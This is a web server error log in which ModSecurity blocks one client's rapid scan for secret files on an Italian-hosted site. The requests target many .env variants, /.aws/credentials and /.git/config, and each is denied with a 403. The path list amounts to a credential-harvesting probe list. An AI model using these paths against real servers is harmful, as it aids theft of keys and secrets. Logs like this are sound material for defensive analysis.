[Wed Jun 18 20:54:45.309187 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aFMLdaD4bWTWTYhGoc0jmAAAAAE"]
[Wed Jun 18 20:54:45.522762 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aFMLdaD4bWTWTYhGoc0jmQAAAAE"]
[Wed Jun 18 20:54:45.522973 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aFMLdaD4bWTWTYhGoc0jmQAAAAE"]
[Wed Jun 18 20:54:45.523199 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aFMLdaD4bWTWTYhGoc0jmQAAAAE"]
[Wed Jun 18 20:54:47.021480 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jmwAAAAE"]
[Wed Jun 18 20:54:47.021722 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jmwAAAAE"]
[Wed Jun 18 20:54:47.021912 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jmwAAAAE"]
[Wed Jun 18 20:54:47.229932 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jnAAAAAE"]
[Wed Jun 18 20:54:47.230145 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jnAAAAAE"]
[Wed Jun 18 20:54:47.230403 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jnAAAAAE"]
[Wed Jun 18 20:54:47.456959 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jnQAAAAE"]
[Wed Jun 18 20:54:47.457162 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jnQAAAAE"]
[Wed Jun 18 20:54:47.457354 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jnQAAAAE"]
[Wed Jun 18 20:54:47.740038 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jngAAAAE"]
[Wed Jun 18 20:54:47.740257 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jngAAAAE"]
[Wed Jun 18 20:54:47.740460 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aFMLd6D4bWTWTYhGoc0jngAAAAE"]
[Wed Jun 18 20:54:47.952024 2025] [authz_core:error] [pid 3929824] [client 56.124.83.181:57576] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Wed Jun 18 20:54:48.255896 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aFMLeKD4bWTWTYhGoc0joAAAAAE"]
[Wed Jun 18 20:54:48.256127 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aFMLeKD4bWTWTYhGoc0joAAAAAE"]
[Wed Jun 18 20:54:48.256317 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aFMLeKD4bWTWTYhGoc0joAAAAAE"]
[Wed Jun 18 20:54:48.752446 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFMLeKD4bWTWTYhGoc0joQAAAAE"]
[Wed Jun 18 20:54:48.752657 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFMLeKD4bWTWTYhGoc0joQAAAAE"]
[Wed Jun 18 20:54:48.752886 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFMLeKD4bWTWTYhGoc0joQAAAAE"]
[Wed Jun 18 20:54:49.070256 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aFMLeaD4bWTWTYhGoc0jogAAAAE"]
[Wed Jun 18 20:54:49.070470 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aFMLeaD4bWTWTYhGoc0jogAAAAE"]
[Wed Jun 18 20:54:49.070648 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aFMLeaD4bWTWTYhGoc0jogAAAAE"]
[Wed Jun 18 20:54:49.400194 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /home/user/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/home/user/.aws/credentials"] [unique_id "aFMLeaD4bWTWTYhGoc0jowAAAAE"]
[Wed Jun 18 20:54:49.400402 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/home/user/.aws/credentials"] [unique_id "aFMLeaD4bWTWTYhGoc0jowAAAAE"]
[Wed Jun 18 20:54:49.400624 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/home/user/.aws/credentials"] [unique_id "aFMLeaD4bWTWTYhGoc0jowAAAAE"]
[Wed Jun 18 20:54:49.697261 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aFMLeaD4bWTWTYhGoc0jpAAAAAE"]
[Wed Jun 18 20:54:49.697469 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aFMLeaD4bWTWTYhGoc0jpAAAAAE"]
[Wed Jun 18 20:54:49.697667 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aFMLeaD4bWTWTYhGoc0jpAAAAAE"]
[Wed Jun 18 20:54:49.918024 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aFMLeaD4bWTWTYhGoc0jpQAAAAE"]
[Wed Jun 18 20:54:49.918266 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aFMLeaD4bWTWTYhGoc0jpQAAAAE"]
[Wed Jun 18 20:54:49.918487 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aFMLeaD4bWTWTYhGoc0jpQAAAAE"]
[Wed Jun 18 20:54:50.263506 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aFMLeqD4bWTWTYhGoc0jpgAAAAE"]
[Wed Jun 18 20:54:50.263726 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aFMLeqD4bWTWTYhGoc0jpgAAAAE"]
[Wed Jun 18 20:54:50.264740 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aFMLeqD4bWTWTYhGoc0jpgAAAAE"]
[Wed Jun 18 20:54:50.509660 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aFMLeqD4bWTWTYhGoc0jpwAAAAE"]
[Wed Jun 18 20:54:50.509876 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aFMLeqD4bWTWTYhGoc0jpwAAAAE"]
[Wed Jun 18 20:54:50.510084 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aFMLeqD4bWTWTYhGoc0jpwAAAAE"]
